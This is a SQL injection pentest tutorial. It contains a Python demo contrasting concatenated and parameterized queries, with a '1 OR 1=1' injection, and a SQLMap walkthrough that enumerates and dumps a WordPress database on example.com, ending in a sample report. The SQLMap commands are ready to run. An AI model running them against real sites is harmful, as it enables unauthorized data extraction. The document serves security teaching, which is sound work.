SQLi Penetration Testing

Introduction to the SQLi

SQL Injection (SQLi) is an attack that allows execution of arbitrary SQL queries on a database through a vulnerable web application. Imagine a nightclub where the bouncer's job is to verify the age of each guest to ensure they're over 21. Instead of checking IDs properly, the bouncer just glances at whatever is shown and lets everyone in, assuming it's valid. This lack of scrutiny allows individuals who are underage and/or have fake IDs to enter the club, potentially causing trouble.

In the case of SQL injection, the web application (bouncer) is supposed to validate and sanitize user inputs (IDs) to ensure only safe and legitimate queries (guests) interact with the database (club). However, if the application fails to properly check and sanitize these inputs, malicious actors (underage individuals) can inject harmful SQL code (fake IDs) into the query, gaining unauthorized access to sensitive data (entering the club) and potentially causing damage.
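The bouncer analogy in code, as an added example that is not part of the original walkthrough: a stand-in for the products.php lookup, first splicing the id parameter straight into the query text, then checking its type and binding it as a parameter. It uses Python's sqlite3 with a constructed products table in place of the site's MySQL database; the table and rows are invented for the demonstration.

```python
import sqlite3

# Constructed sample rows standing in for the real products table.
SAMPLE_PRODUCTS = [
    (1, "Widget", 9.99),
    (2, "Gadget", 19.99),
    (3, "Internal SKU (not for sale)", 0.0),
]


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The bouncer who only glances at the ID.

    The untrusted value is concatenated into the SQL text, so whatever the
    client sends becomes part of the query's structure, not just its data.
    """
    sql = f"SELECT id, name FROM products WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """The bouncer who actually checks the ID.

    Enforce the expected type first, then bind the value as a parameter so
    the database engine treats it strictly as data.
    """
    try:
        product_id = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return conn.execute(
        "SELECT id, name FROM products WHERE id = ?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1        ->", lookup_vulnerable(db, "1"))
    print("vulnerable, id=1 OR 1=1 ->", lookup_vulnerable(db, "1 OR 1=1"))
    print("safe, id=1              ->", lookup_safe(db, "1"))
```

The second call shows the query's WHERE clause being rewritten by the input, which is exactly the behaviour SQLMap probes for in the steps below; the safe version rejects the same input before it ever reaches the database.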

This walkthrough demonstrates using SQLMap to exploit a vulnerable URL parameter on a MySQL-based website. Steps include confirming the vulnerability, enumerating databases, and extracting data from the "wordpress" database. The scenario highlights the impact of SQLi vulnerabilities, such as unauthorized data access, and concludes with preparing a pentest report to document findings and recommendations.

SQLMap: SQLi Scenario

Step 1: Identify the Target

The engagement is to assess the security of the website http://example.com. The target URL is http://example.com/products.php?id=1.

Step 2: Initial Reconnaissance

Use basic browser testing and tools like Burp Suite to determine if the id parameter in the URL might be vulnerable to SQL injection.

Step 3: Running SQLMap for SQL Injection

Use SQLMap to test and exploit the SQL injection vulnerability.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql --batch --banner

Command Explanation

  • -u "http://example.com/products.php?id=1": Specifies the URL whose parameter (here, id) is the potential SQL injection point.
  • --dbms=mysql: Tells SQLMap the back-end DBMS is MySQL, so it skips DBMS fingerprinting and uses only MySQL-specific payloads.
  • --batch: Runs in non-interactive mode, answering every prompt with its default.
  • --banner: Retrieves the database server's version banner to confirm the DBMS type and version.

Step 4: Database Enumeration

After confirming the vulnerability and the database type, enumerate the databases.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql --batch --dbs

Command Explanation

  • --dbs: Enumerates the databases on the MySQL server (those visible to the account the application connects with).

Step 5: Dumping Tables from a Specific Database

Target the "wordpress" database to list tables and dump data.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql -D wordpress --tables

Command Explanation

  • -D wordpress: Specifies the "wordpress" database.
  • --tables: Lists all tables within the "wordpress" database.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql -D wordpress --dump

Command Explanation

  • --dump: Dumps all entries from the tables in the "wordpress" database.

Step 6: Reporting Findings

The pentester documents the findings, including:

  • The vulnerable URL and parameter.
  • The database server type and version.
  • The list of databases and tables.
  • Sample data extracted from the database.

Example Report
Vulnerable URL: http://example.com/products.php?id=1

Database Server: MySQL 5.7.29

Databases Found:

  • information_schema
  • mysql
  • performance_schema
  • wordpress

Tables in 'wordpress' Database:

  • wp_users
  • wp_posts
  • wp_comments

Sample Data from 'wp_users' Table:

| ID | user_login | user_pass           | user_email          |
|----|------------|---------------------|---------------------|
| 1  | admin      | $P$B1234567890abcdef| admin@example.com   |